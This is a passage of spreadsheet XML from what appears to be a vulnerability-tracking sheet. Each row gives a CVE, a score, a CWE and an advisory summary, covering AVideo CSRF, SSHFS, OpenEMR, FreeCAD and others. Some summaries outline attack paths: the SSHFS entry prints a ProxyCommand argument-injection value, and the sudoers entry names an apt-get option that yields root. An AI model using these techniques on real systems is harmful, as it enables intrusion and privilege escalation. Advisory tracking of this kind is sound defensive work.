        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3348" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in the LoginControl plugin PGP key endpoints that lack CSRF token validation. Attackers can craft malicious pages with image tags pointing to savePublicKey.json.php to replace a logged-in victim's PGP 2FA public key, causing lockout or enabling account takeover if the attacker knows the password.</t>
        </is>
      </c>
      <c r="M3348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88870</t>
        </is>
      </c>
    </row>
    <row r="3349">
      <c r="A3349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88872</t>
        </is>
      </c>
      <c r="C3349" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3349" s="5" t="inlineStr"/>
      <c r="F3349" s="5" t="inlineStr"/>
      <c r="G3349" s="5" t="inlineStr"/>
      <c r="H3349" s="5" t="inlineStr"/>
      <c r="I3349" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3349" s="5" t="inlineStr"/>
      <c r="K3349" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3349" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in the setPassword.json.php endpoint that allows unauthenticated attackers to modify any user's channel password by sending a GET request. Attackers can craft a malicious webpage that, when visited by an authenticated administrator, sets or clears any user's channel password without CSRF token validation.</t>
        </is>
      </c>
      <c r="M3349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88872</t>
        </is>
      </c>
    </row>
    <row r="3350">
      <c r="A3350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88873</t>
        </is>
      </c>
      <c r="C3350" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3350" s="5" t="inlineStr"/>
      <c r="F3350" s="5" t="inlineStr"/>
      <c r="G3350" s="5" t="inlineStr"/>
      <c r="H3350" s="5" t="inlineStr"/>
      <c r="I3350" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3350" s="5" t="inlineStr"/>
      <c r="K3350" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3350" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in view/logArchive.json.php that allows unauthenticated attackers to archive application logs by making GET requests without CSRF token validation. Attackers can craft malicious pages that trigger administrators' browsers to request the endpoint, copying sensitive application logs to a publicly accessible zip file and truncating the live log to remove forensic evidence.</t>
        </is>
      </c>
      <c r="M3350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88873</t>
        </is>
      </c>
    </row>
    <row r="3351">
      <c r="A3351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88898</t>
        </is>
      </c>
      <c r="C3351" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3351" s="5" t="inlineStr"/>
      <c r="F3351" s="5" t="inlineStr"/>
      <c r="G3351" s="5" t="inlineStr"/>
      <c r="H3351" s="5" t="inlineStr"/>
      <c r="I3351" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3351" s="5" t="inlineStr"/>
      <c r="K3351" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3351" s="5" t="inlineStr">
        <is>
          <t>AppFlowy-Cloud versions 0.7.2 through 0.9.64 fail to authorize callers against the workspace in the bulk publish endpoint path, allowing authenticated users to publish content into other tenants' namespaces. Attackers can write published views with attacker-controlled title, body and metadata into victim workspaces to deface public pages or host phishing content on trusted URLs.</t>
        </is>
      </c>
      <c r="M3351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88898</t>
        </is>
      </c>
    </row>
    <row r="3352">
      <c r="A3352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88915</t>
        </is>
      </c>
      <c r="C3352" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3352" s="5" t="inlineStr"/>
      <c r="F3352" s="5" t="inlineStr"/>
      <c r="G3352" s="5" t="inlineStr"/>
      <c r="H3352" s="5" t="inlineStr"/>
      <c r="I3352" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3352" s="5" t="inlineStr"/>
      <c r="K3352" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3352" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP do not consistently enforce the acting user's authorization when instantiating event templates.
For templates using distribution = 4, the template can specify a sharing_group_id. The instantiation path passed that value into event creation without verifying that the user instantiating the template was actually permitted to use the selected sharing group. The commit notes that Event::_add() only performed its own sharing-group authorization in another code path, leaving template instantiation able to write the identifier directly.
The same instantiation path also attached template-specified tags without checking the user's normal tagging permissions. In addition, it hardcoded local =&gt; 0, meaning tags marked local_only could be attached globally and consequently propagate through synchronization or export, contrary to their intended restriction.
The fix adds explicit SharingGroup::canUse() authorization for the acting user, applies the same tag-modification checks used by normal event tagging, and ensures local_only tags are attached locally.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M3352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88915</t>
        </is>
      </c>
    </row>
    <row r="3353">
      <c r="A3353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88938</t>
        </is>
      </c>
      <c r="C3353" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3353" s="5" t="inlineStr"/>
      <c r="F3353" s="5" t="inlineStr"/>
      <c r="G3353" s="5" t="inlineStr"/>
      <c r="H3353" s="5" t="inlineStr"/>
      <c r="I3353" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3353" s="5" t="inlineStr"/>
      <c r="K3353" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3353" s="5" t="inlineStr">
        <is>
          <t>knowns through 0.33.0 fails to confine the path argument of the code.find MCP tool to the project root, allowing AI agent sessions to read source files anywhere on the host. Attackers can supply absolute paths or relative traversal sequences to the path argument and retrieve full file contents from outside the intended project directory.</t>
        </is>
      </c>
      <c r="M3353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88938</t>
        </is>
      </c>
    </row>
    <row r="3354">
      <c r="A3354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89011</t>
        </is>
      </c>
      <c r="C3354" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3354" s="5" t="inlineStr"/>
      <c r="F3354" s="5" t="inlineStr"/>
      <c r="G3354" s="5" t="inlineStr"/>
      <c r="H3354" s="5" t="inlineStr"/>
      <c r="I3354" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3354" s="5" t="inlineStr"/>
      <c r="K3354" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L3354" s="5" t="inlineStr">
        <is>
          <t>isomorphic-git before 1.42.0 contains a prototype pollution vulnerability in the getRemoteInfo function that allows a malicious Git server operator to pollute Object.prototype by advertising crafted ref names containing '__proto__' path segments during ref negotiation. Attackers controlling a Git server can advertise a specially crafted ref such as '__proto__/corsProxy' to reroute all subsequent network operations through an attacker-controlled proxy, causing isomorphic-git to invoke the victim's onAuth callback and transmit credentials to the attacker when the victim calls getRemoteInfo with an attacker-supplied URL.</t>
        </is>
      </c>
      <c r="M3354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89011</t>
        </is>
      </c>
    </row>
    <row r="3355">
      <c r="A3355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89245</t>
        </is>
      </c>
      <c r="C3355" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3355" s="5" t="inlineStr"/>
      <c r="F3355" s="5" t="inlineStr"/>
      <c r="G3355" s="5" t="inlineStr"/>
      <c r="H3355" s="5" t="inlineStr"/>
      <c r="I3355" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3355" s="5" t="inlineStr"/>
      <c r="K3355" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3355" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in playlistRemove.php that allows attackers to delete playlists by skipping CSRF protection checks. Attackers can craft a malicious form that submits a POST request to playlistRemove.php, causing a victim's playlist to be deleted when they visit the attacker's page while logged in.</t>
        </is>
      </c>
      <c r="M3355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89245</t>
        </is>
      </c>
    </row>
    <row r="3356">
      <c r="A3356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89251</t>
        </is>
      </c>
      <c r="C3356" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3356" s="5" t="inlineStr"/>
      <c r="F3356" s="5" t="inlineStr"/>
      <c r="G3356" s="5" t="inlineStr"/>
      <c r="H3356" s="5" t="inlineStr"/>
      <c r="I3356" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3356" s="5" t="inlineStr"/>
      <c r="K3356" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L3356" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to validate ad impressions in plugin/AD_Server/log.php, allowing logged-in users to submit arbitrary label values that trigger unverified wallet credits to campaign video owners. Attackers can repeatedly POST label=start requests to mint YPTWallet balance for any campaign video without proof an ad actually played.</t>
        </is>
      </c>
      <c r="M3356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89251</t>
        </is>
      </c>
    </row>
    <row r="3357">
      <c r="A3357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89252</t>
        </is>
      </c>
      <c r="C3357" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3357" s="5" t="inlineStr"/>
      <c r="F3357" s="5" t="inlineStr"/>
      <c r="G3357" s="5" t="inlineStr"/>
      <c r="H3357" s="5" t="inlineStr"/>
      <c r="I3357" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3357" s="5" t="inlineStr"/>
      <c r="K3357" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3357" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to verify ownership in addLiveLink.php when updating LiveLinks, allowing authenticated users to modify other users' links. A canStream user can overwrite another user's LiveLink HLS source and metadata by supplying an existing linkId, redirecting viewers to attacker-controlled media.</t>
        </is>
      </c>
      <c r="M3357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89252</t>
        </is>
      </c>
    </row>
    <row r="3358">
      <c r="A3358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9331</t>
        </is>
      </c>
      <c r="C3358" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3358" s="5" t="inlineStr"/>
      <c r="F3358" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3358" s="5" t="inlineStr"/>
      <c r="H3358" s="5" t="inlineStr"/>
      <c r="I3358" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3358" s="5" t="inlineStr"/>
      <c r="K3358" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3358" s="5" t="inlineStr">
        <is>
          <t>The EDD Product Catalog Feed by PixelYourSite plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the wpeddpcf_delete_feed function in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users.</t>
        </is>
      </c>
      <c r="M3358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9331</t>
        </is>
      </c>
    </row>
    <row r="3359">
      <c r="A3359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3359" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-48564</t>
        </is>
      </c>
      <c r="C3359" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3359" s="5" t="inlineStr"/>
      <c r="F3359" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3359" s="5" t="inlineStr"/>
      <c r="H3359" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="I3359" s="5" t="inlineStr">
        <is>
          <t>2025-12-08</t>
        </is>
      </c>
      <c r="J3359" s="5" t="inlineStr"/>
      <c r="K3359" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L3359" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible intent filter bypass due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M3359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-48564</t>
        </is>
      </c>
    </row>
    <row r="3360">
      <c r="A3360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15419</t>
        </is>
      </c>
      <c r="C3360" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3360" s="5" t="inlineStr"/>
      <c r="F3360" s="5" t="inlineStr"/>
      <c r="G3360" s="5" t="inlineStr"/>
      <c r="H3360" s="5" t="inlineStr"/>
      <c r="I3360" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3360" s="5" t="inlineStr"/>
      <c r="K3360" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L3360" s="5" t="inlineStr">
        <is>
          <t>In the silabser.sys driver for CP210x devices v11.5.0 and earlier, a local unprivileged user with a malicious device can use malformed packets to corrupt kernel pool memory, resulting in arbitrary code execution with escalated privileges.</t>
        </is>
      </c>
      <c r="M3360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15419</t>
        </is>
      </c>
    </row>
    <row r="3361">
      <c r="A3361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34789</t>
        </is>
      </c>
      <c r="C3361" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3361" s="5" t="inlineStr"/>
      <c r="F3361" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3361" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3361" s="5" t="inlineStr"/>
      <c r="I3361" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3361" s="5" t="inlineStr"/>
      <c r="K3361" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L3361" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. Prior to 1.1.2, src/App/PropertyPythonObject.cpp in PropertyPythonObject::Restore() passes the attacker-controlled module attribute from serialized PropertyPythonObject XML directly to PyImport_ImportModule() while restoring a crafted FCStd document, which executes module-level Python code, and the legacy pickle branch also imports an attacker-controlled module and invokes its class constructor through PyObject_CallObject(). This issue is fixed in version 1.1.2.</t>
        </is>
      </c>
      <c r="M3361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34789</t>
        </is>
      </c>
    </row>
    <row r="3362">
      <c r="A3362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40506</t>
        </is>
      </c>
      <c r="C3362" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3362" s="5" t="inlineStr"/>
      <c r="F3362" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3362" s="5" t="inlineStr"/>
      <c r="H3362" s="5" t="inlineStr"/>
      <c r="I3362" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3362" s="5" t="inlineStr"/>
      <c r="K3362" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3362" s="5" t="inlineStr">
        <is>
          <t>OpenEMR before 8.2.0 contains a path traversal vulnerability in the standard_tables_manage.php interface where the db GET parameter is passed without validation to temp_dir_cleanup(), which joins the value to the PHP temporary directory path and recursively deletes the resulting directory. Attackers can supply a traversal sequence in the db parameter to resolve outside the intended temporary directory, and by chaining this with an open redirect in dicom_frame.php, an unauthenticated attacker can deliver a crafted URL that triggers arbitrary recursive directory deletion within an authenticated Superuser's session.</t>
        </is>
      </c>
      <c r="M3362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40506</t>
        </is>
      </c>
    </row>
    <row r="3363">
      <c r="A3363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48711</t>
        </is>
      </c>
      <c r="C3363" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3363" s="5" t="inlineStr"/>
      <c r="F3363" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3363" s="5" t="inlineStr"/>
      <c r="H3363" s="5" t="inlineStr"/>
      <c r="I3363" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3363" s="5" t="inlineStr"/>
      <c r="K3363" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L3363" s="5" t="inlineStr">
        <is>
          <t>SSHFS is a network filesystem client for connecting to SSH servers. From version 1.4 until 3.7.6, SSHFS accepts a bracketed mount source such as [-oProxyCommand=CMD]:/path and find_base_path() removes the brackets, leaving a host value that begins with - and is passed directly to ssh as a command-line argument. When a caller also supplies a path-valued sftp_server, ssh treats the normalized host as an option and the server path as its destination, causing an injected ProxyCommand to execute locally before any connection or authentication succeeds. The attack requires a caller or wrapper that passes an attacker-controlled mount source to SSHFS with the required sftp_server configuration and results in arbitrary command execution as the user running SSHFS. This issue is fixed in version 3.7.6.</t>
        </is>
      </c>
      <c r="M3363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48711</t>
        </is>
      </c>
    </row>
    <row r="3364">
      <c r="A3364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4878</t>
        </is>
      </c>
      <c r="C3364" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3364" s="5" t="inlineStr"/>
      <c r="F3364" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3364" s="5" t="inlineStr"/>
      <c r="H3364" s="5" t="inlineStr">
        <is>
          <t>libcap_project:libcap, redhat:enterprise_linux, redhat:openshift_container_platform</t>
        </is>
      </c>
      <c r="I3364" s="5" t="inlineStr">
        <is>
          <t>2026-04-09</t>
        </is>
      </c>
      <c r="J3364" s="5" t="inlineStr"/>
      <c r="K3364" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L3364" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libcap. A local unprivileged user can exploit a Time-of-check-to-time-of-use (TOCTOU) race condition in the `cap_set_file()` function. This allows an attacker with write access to a parent directory to redirect file capability updates to an attacker-controlled file. By doing so, capabilities can be injected into or stripped from unintended executables, leading to privilege escalation.</t>
        </is>
      </c>
      <c r="M3364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4878</t>
        </is>
      </c>
    </row>
    <row r="3365">
      <c r="A3365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50349</t>
        </is>
      </c>
      <c r="C3365" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3365" s="5" t="inlineStr"/>
      <c r="F3365" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3365" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3365" s="5" t="inlineStr"/>
      <c r="I3365" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3365" s="5" t="inlineStr"/>
      <c r="K3365" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3365" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50349</t>
        </is>
      </c>
    </row>
    <row r="3366">
      <c r="A3366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52817</t>
        </is>
      </c>
      <c r="C3366" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3366" s="5" t="inlineStr"/>
      <c r="F3366" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3366" s="5" t="inlineStr"/>
      <c r="H3366" s="5" t="inlineStr"/>
      <c r="I3366" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3366" s="5" t="inlineStr"/>
      <c r="K3366" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L3366" s="5" t="inlineStr">
        <is>
          <t>Linuxfabrik Monitoring Plugins provides monitoring plugins for Icinga, Nagios, and related systems. Prior to version 5.1.0, the shipped assets/sudoers/Debian.sudoers policy allowed the nagios or icinga account to execute /usr/bin/apt-get as root without restricting its arguments. An attacker who already controls that monitoring account can supply the APT::Update::Pre-Invoke option to execute an arbitrary command while apt-get runs with root privileges, resulting in a root shell and complete compromise of the host. The vulnerable rule supports the check-plugins/deb-updates/deb-updates plugin, but it authorized arbitrary apt-get argument sequences rather than only the required apt-get update --quiet 2 command. This issue is fixed in version 5.1.0.</t>
        </is>
      </c>
      <c r="M3366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52817</t>
        </is>
      </c>
    </row>
    <row r="3367">
      <c r="A3367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54467</t>
        </is>
      </c>
      <c r="C3367" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3367" s="5" t="inlineStr"/>
      <c r="F3367" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3367" s="5" t="inlineStr"/>
      <c r="H3367" s="5" t="inlineStr"/>
      <c r="I3367" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3367" s="5" t="inlineStr"/>
      <c r="K3367" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="L3367" s="5" t="inlineStr">
        <is>
          <t>On the Trusted Firmware-M (TF-M) 2 through 2.3.0 platform before 00d1b3e, mailbox initialization on PSOC64 and RP2350 accepts a non-secure, unvalidated, supplied pointer.</t>
        </is>
      </c>
      <c r="M3367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54467</t>
        </is>
      </c>
    </row>
    <row r="3368">
      <c r="A3368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58230</t>
        </is>
      </c>
      <c r="C3368" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3368" s="5" t="inlineStr"/>
      <c r="F3368" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3368" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H3368" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I3368" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3368" s="5" t="inlineStr"/>
      <c r="K3368" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L3368" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not sufficiently validate certain token content under specific configurations. An unauthenticated attacker could send a specially crafted token to cause sensitive credential material to be sent to an attacker-controlled destination. The attack complexity is high due to non-default preconditions required in the target environment. This results in a high impact on confidentiality and a low impact on integrity and availability.</t>
        </is>
      </c>
      <c r="M3368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58230</t>
        </is>
      </c>
    </row>
    <row r="3369">
      <c r="A3369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58848</t>
        </is>
      </c>
      <c r="C3369" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3369" s="5" t="inlineStr"/>
      <c r="F3369" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3369" s="5" t="inlineStr"/>
      <c r="H3369" s="5" t="inlineStr"/>
      <c r="I3369" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3369" s="5" t="inlineStr"/>
      <c r="K3369" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L3369" s="5" t="inlineStr">
